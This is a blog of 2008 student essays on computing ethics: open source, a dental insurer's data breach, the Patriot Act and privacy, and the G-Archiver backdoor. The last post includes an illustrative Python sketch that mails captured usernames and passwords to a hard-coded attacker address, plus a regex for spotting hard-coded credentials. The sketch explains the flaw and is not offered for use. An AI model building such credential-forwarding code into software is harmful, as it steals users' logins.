Showing posts with label ethics.

Monday, April 14, 2008

Social Implications of Open Source Software

Here's the prompt for this week's paper:

“Positive or Negative social implications of open source or 'free software'.”

What is open source or 'free' software? In this analysis I'm only going to refer to open source software, commonly described as “Free as in 'Free Speech'”. This means you have access to the source code, are free to modify it however you wish, and may even redistribute it. The other definition is often stated as “Free as in 'Free Beer'”, meaning it costs nothing. The two often go hand in hand: once you have the source code and the right to redistribute it, nothing stops you from giving it away at no cost. I'm not going to discuss the economics of open source software, as I feel that discussion is better suited for a different place.

What are the implications of open source software? You have the ability to look into exactly what a program does, learn from it, or improve it. People also tend to argue that software that is not open source is unethical. Although I am a huge supporter of open source software, I have to argue that they are wrong. An article titled The Social Implications of Free Software on FSM states:

“Above all, Free Software is an ethical choice—not one of convenience. NGOs also tend to receive, store and disseminate huge amounts of information. It helps to be able to access info (in digital format) without having to 1) break the law, and 2) spend money to purchase applications to “read” the information. Using free software enables that, as South India-based lawyer Mahesh Pai points out.”

The argument made here is a non-sequitur; the argument for open source software is that it is free and legal, which in no way implies that proprietary software is unethical. There should be a distinction between ethical implications and economic factors. It is not unethical to charge people for a product. The point made here is that a social implication of open source software is that it is much more likely to be used in an economically challenged locale, due to the low cost of the software (which is often gratis).

There are many benefits to using open source software. Nearly all proprietary software now has an open source counterpart, and in my opinion, many of them are much better than their proprietary equivalents. (There are also some that are much worse.) Open source software is often more secure than proprietary software, which is interesting given that the full source code is available to anyone who wants to see it. I have written about this topic before; if you want to read more, go read my previous post Security through Open Source.

Open source software is created by a community of developers who share a generally common set of beliefs. This has led to its own community of OSS developers and users, a community that continues to grow and thrive today. It has a great property that will lead to its success: the more developers who work on OSS, and the more users who commit to the community, the stronger it grows. This is fostered by the idea that all the software should be available as source code, and that anyone is free to modify and redistribute it. As more people work on it, bugs are fixed, features are added, and the software becomes more useful to more people.

Monday, March 31, 2008

Another data breach goes nearly unnoticed.

The topic is vague this week; I'm under the assumption that I can choose basically anything involving ethics in computer science for this article. Link to the original assignment.

A recent incident of personal data being unintentionally released has affected 75,000 members of the public website of The Dental Network. The information contained full names, complete addresses, dates of birth, and Social Security numbers. This was reported by The Baltimore Sun on March 26th, 2008, even though the security breach happened February 20th, and the affected persons were not informed by letter until March 10th, nearly three weeks later. Thousands of dollars in unauthorized purchases, accounts being opened and held for later use, and many other illegal activities all could have happened before anyone was informed that they were at risk.

According to the Baltimore Sun article:

“The company says that to its knowledge, no one has misused the information.”
The company has offered those who were affected 12 months of free credit monitoring, and sent them information on how to contact the credit bureaus and put a fraud alert on their accounts.
"We moved in a timely fashion to secure the data and notify the members,"
said CareFirst spokesman Michael Sullivan, but the article also mentions that
“[The information] had been posted on its Web site for two weeks in February because of a technical error.”

The Consumerist also picked up this article and added a few interesting points. They are critical of the company's offer of a year of free credit monitoring, saying it's too short:
“Companies, is it really that expensive to offer 5 years, or 10 years, of credit monitoring to victims of your data security incompetence? Seriously, own up to your responsibility in exposing people to the risk of financial and credit problems and give them the tools they need to protect themselves. After all, it's your fault.”

This is a valid point. The company is at fault here, and the threat of identity theft due to this will not be gone in one year.

While on the website of The Dental Network, I could find no mention of the data breach, even though it is now only three weeks after the affected users were informed, and only three days after the article was picked up by The Baltimore Sun. The home page of the site now displays this message:
“New Sales of Dental HMO Products Temporarily Halted in Maryland, Due to a technical issue involving the internal restructuring of The Dental Network (TDN).”

The company seems to be taking no responsibility for what has happened, instead trying to hide it from people to maintain a semblance of security. Take a look and judge for yourself; the website looks like it was created 10 years ago, and their policy for data integrity probably hasn't been updated since then.

It is the responsibility of The Dental Network to inform the people affected in this case. Maryland has a state law that requires businesses to respond promptly in the case of a data breach, and it is my opinion that this company did not adhere to it. The users in this case should have been granted the positive right to privacy by the company, but instead that right was violated and the data was leaked. This clearly violates the ACM Code of Ethics, specifically section 1.7:
“Respect the privacy of others.”
The Dental Network should have been more diligent in securing the personal data of its users, and much faster at noticing the breach and notifying them. Two weeks passed before the breach was noticed, and three more before users were notified. That's five weeks during which a potential criminal could have had access to this data. Five weeks is completely unacceptable.

UPDATE: I found the FAQ for the data breach. The information there isn't very helpful, and would likely only confuse most people and cause them to ignore it. All of it is about what you should do; the company seems to be doing nothing on its own, leaving the majority of people affected without any protection against identity theft.

Thursday, March 27, 2008

U.S. Patriot Act causes ethical concerns for software developers

Here's the topic from the third paper:

“Pick an example from Chapter 2 or 5 and show if the people who built the software acted ethically according to Appendix A and your general sense of ethics.”


It occurs to me that I haven't noted which textbook we are using. It is A Gift of Fire, by Sara Baase, Third Edition.

Here's my paper; I tried not to include too many references to the book, but some were needed for this assignment.

A good example of software built upon questionable ethics is the software and procedures that the government uses to obtain personal information about suspected criminals.[1] “The U.S. Patriot Act, passed in the weeks after the September, 2001, terrorist attacks in the United States, gives authorities the means to secretly view personal data held by U.S. organizations,” from the article Patriot Act haunts Google service on www.theglobeandmail.com. This law conflicts with many other governments' privacy laws, which require organizations to protect all private information and to inform the consumer when this information is obtained by a third party, regardless of the process. According to the Software Engineering Code of Ethics and Professional Practice (Version 5.2), section 1.04, software engineers shall, as appropriate, “Disclose to appropriate persons or authorities any actual or potential danger to the user, the public, or the environment, that they reasonably believe to be associated with software or related documents.” It is my argument that the U.S. Patriot Act creates the potential for private data to be obtained by an outside party, in this case the U.S. government, and that this causes an ethical dilemma for software developers, specifically in the U.S.

Some people have recently noted the effects of the law. In a recent article posted on www.theglobeandmail.com, and also covered on boingboing.net, there is a discussion of how the U.S. Patriot Act affects the use of Gmail, specifically in countries outside the U.S. The information Google obtains when someone uses Gmail can legally be reviewed by the U.S. government under loose controls. Not only is the ethics of the U.S. Patriot Act with regard to privacy put into question, but it also causes an ethical dilemma for software developers. If the government can obtain personal information about someone without a warrant, is it ethical for a software company to keep data about you without informing you of the potential breach of privacy? A well-defined privacy policy such as Google's is likely to include a clause for this situation, such as “We may also share information with third parties in limited circumstances, including when complying with legal process, preventing fraud or imminent harm, and ensuring the security of our network and services.” It is my opinion that privacy policies are created to protect the organization rather than the end user.

Many people would argue that the privacy policy is a solution to the ethical issues presented here, but I do not think it provides a full solution. The majority of users will never read a privacy policy, and of those who do, many will not understand its complete implications. It's likely the privacy policy misses some small detail that is important to the user, or some situation the writer completely overlooked. It would be nearly impossible for the writer to know the complete set of laws that govern their organization, especially with the recent globalization of Internet-based companies. How far do you have to go in informing the end user of the possible dangers of using your service before you have done what can be considered ethical?

Unfortunately, I don't have a solution to this problem. Ethical guidelines dictate that you should inform the end user of all potential danger to them, and breaches of privacy clearly fall into this category. However, “no matter what promises companies make (or what privacy laws Congress might enact), data leaks happen,” so maybe that should be taken into account when writing a privacy policy. If there is a distinct possibility of a third party obtaining a user's personal data without that user's permission, the software developer should make this apparent to all of its users. It doesn't matter whether the third party is a government or someone malicious looking to steal your identity; it still constitutes a breach of privacy, and the user needs to be informed.

Monday, March 24, 2008

Security through Open Source

Topic for paper number two:

Write a “Short paper on a computing technology of your choosing introduced in the last 30 years that you believe has been used unethically. Include references and cite from the Codes of Ethics in Appendix A.”



There have been many new computing tools introduced in the last 30 years, and some even earlier, that have been used unethically. Usually these tools have legitimate and legal reasons for being created, but they can often also be used for questionable or unethical behavior. The UNIX security scanner Nmap has many legitimate uses and is packaged for almost all Linux systems. However, even a program this widespread can be used for black-hat purposes.

A more recent example (Nmap was created in 1997) came up in an article on Coding Horror entitled A Question of Programming Ethics. A program called G-Archiver was found to contain code that used a hard-coded email address and password to send every username and password entered into the software back to the creator of the program. This was a huge breach of trust between the author of the program and its users. Luckily, a good-hearted programmer had looked into the source code and found this, and instead of abusing what he found, he deleted all of the emails in the account, changed the password, and sent a message to Google asking them to delete the account.
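To make the mechanism concrete, here is a minimal sketch in Python of what such a hard-coded-credential backdoor looks like. This is not G-Archiver's actual code; every name, address, and password below is invented for illustration.

```python
# Hypothetical sketch of a hard-coded-credential backdoor of the kind
# found in G-Archiver. All names and values here are invented.
SMTP_HOST = "smtp.gmail.com"
BACKDOOR_USER = "backdoor@example.com"  # hard-coded: visible to anyone reading the source
BACKDOOR_PASS = "p4ssw0rd"              # likewise

def build_exfiltration_email(victim_user: str, victim_pass: str) -> str:
    """Compose the message the backdoor would mail to its own author."""
    return (
        f"From: {BACKDOOR_USER}\r\n"
        f"To: {BACKDOOR_USER}\r\n"
        "Subject: new user\r\n"
        "\r\n"
        f"user={victim_user} pass={victim_pass}\r\n"
    )

# The real program would then connect and send, roughly:
#   with smtplib.SMTP_SSL(SMTP_HOST) as smtp:
#       smtp.login(BACKDOOR_USER, BACKDOOR_PASS)
#       smtp.sendmail(BACKDOOR_USER, [BACKDOOR_USER], message)
```

Note that the account name and password have to be embedded as literal strings for the backdoor to work at all, so anyone who reads the source (or decompiles the binary) can recover them and take over the account, which is exactly what happened here.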

There is no way to know exactly how many people could have found this before the security flaw was exposed and, instead of doing what this person did, stayed quiet and used the stolen information for their own purposes. Since the source code was easily examined, this flaw was found; imagine how long it could have gone on if the source had not been accessible. This brings up the topic of security through openness.
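Accessible source is what makes this kind of flaw cheap to find: even a crude, mechanical audit can flag embedded credentials. A minimal sketch, using an invented "decompiled" snippet and a deliberately naive pattern (real audit tools are far more thorough):

```python
import re

# Invented stand-in for a decompiled program; not real G-Archiver code.
DECOMPILED_SOURCE = '''
smtp.Connect("smtp.gmail.com");
smtp.Login("backdoor@example.com", "p4ssw0rd");
smtp.Send(victimUser + ":" + victimPass);
'''

# Flag any login-like call that passes two quoted string literals --
# a telltale sign of hard-coded credentials.
CRED_PATTERN = re.compile(r'(?i)(login|auth|connect)\s*\(\s*"([^"]+)"\s*,\s*"([^"]+)"')

def find_hardcoded_credentials(source: str):
    """Return (call, user, password) tuples for suspicious string literals."""
    return [m.groups() for m in CRED_PATTERN.finditer(source)]

print(find_hardcoded_credentials(DECOMPILED_SOURCE))
# [('Login', 'backdoor@example.com', 'p4ssw0rd')]
```

The `Connect` call is not flagged because it passes only one string literal; only the call carrying a literal username-and-password pair matches.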

By completely exposing what your program does, you give the end user a way to verify that it only does what you say it does. However, this also allows the end user to more easily find vulnerabilities in the software. Having an open source program forces the programmer to understand these risks, which also helps to avoid poor decisions such as relying on security through obscurity. This could be interpreted as applying directly to Principle 1.04 of the Software Engineering Code of Ethics: “Disclose to appropriate persons or authorities any actual or potential danger to the user, the public, or the environment, that they reasonably believe to be associated with software or related documents.” How could you disclose any more information about your software than by releasing the full source code?

There will always be tools created for completely legitimate purposes that are converted into tools for unethical uses. Something as simple as a match has many ethical uses, but it can also be used to burn down a house. The only thing you as a programmer can do is make sure you make ethical decisions; you don't get to choose what your users will do.